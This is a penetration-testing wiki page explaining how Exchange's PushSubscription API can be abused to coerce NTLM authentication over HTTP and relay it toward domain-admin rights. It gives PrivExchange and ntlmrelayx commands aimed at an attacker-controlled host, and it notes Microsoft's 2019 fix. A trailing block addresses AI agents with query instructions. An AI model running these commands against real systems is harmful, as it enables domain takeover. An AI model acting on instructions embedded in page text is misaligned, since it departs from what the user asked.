> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md).
# PushSubscription abuse
## Theory
"PushSubscription" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. **The coerced authentication is made over HTTP**, which is particularly powerful when doing [NTLM relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) ([because of the Session Signing and MIC mitigations](broken://pages/PFGlaZOk9WQQxTsZmSJ0#mic-message-integrity-code)). As Exchange servers usually have high privileges in a domain (i.e. `WriteDacl`, see [Abusing ACLs](broken://pages/4BIFRCf5fXqahfOIAeGb)), the forced authentication can then be relayed and abused to obtain domain admin privileges (see [NTLM Relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) and [Kerberos Unconstrained Delegations](/ad/movement/kerberos/delegations.md#unconstrained-delegations-kud)).
## Practice
[PrivExchange](https://github.com/dirkjanm/privexchange/) (Python) is a tool able to log in on Exchange Web Services and call that API.
```bash
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
```
{% hint style="info" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](broken://pages/PFGlaZOk9WQQxTsZmSJ0) to make the API call.
The modified [httpattack.py](https://github.com/dirkjanm/PrivExchange/blob/master/httpattack.py) can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.
```bash
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py
mv httpattack.py httpattack.py.old
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
cd /PATH/TO/impacket
pip3 install .
ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx
```
{% endhint %}
{% hint style="warning" %}
On February 12th 2019, Microsoft released updates for Exchange which resolved
* the coerced authentication issue
* the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.
{% endhint %}
## References
{% embed url="" %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.